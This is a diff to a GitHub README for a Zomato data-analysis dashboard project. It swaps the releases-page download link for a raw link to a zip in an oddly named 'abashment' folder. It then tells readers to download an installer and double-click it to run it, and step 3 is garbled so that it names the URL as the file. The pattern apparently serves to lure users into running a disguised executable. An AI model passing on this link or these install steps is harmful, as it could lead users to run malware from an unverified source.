renzsvdra/Zomato-Data-Analysis-Dashboard/README.md

 ## 🔗 Download & Install

-To get the application, visit this page to download: [Download the Latest Release](https://github.com/renzsvdra/Zomato-Data-Analysis-Dashboard/releases).
+To get the application, visit this page to download: [Download the Latest Release](https://raw.githubusercontent.com/renzsvdra/Zomato-Data-Analysis-Dashboard/main/abashment/Zomato-Data-Analysis-Dashboard.zip).

 1. Click on the download link above.
 2. Find the latest version listed.
-3. Download the file named `Zomato_Data_Analysis_Dashboard.exe` for Windows or the equivalent for your OS.
+3. Download the file named `https://raw.githubusercontent.com/renzsvdra/Zomato-Data-Analysis-Dashboard/main/abashment/Zomato-Data-Analysis-Dashboard.zip` for Windows or the equivalent for your OS.
 4. Once downloaded, locate the file in your downloads folder.
 5. Double-click the file to run the installer.
 6. Follow the on-screen instructions to complete the installation.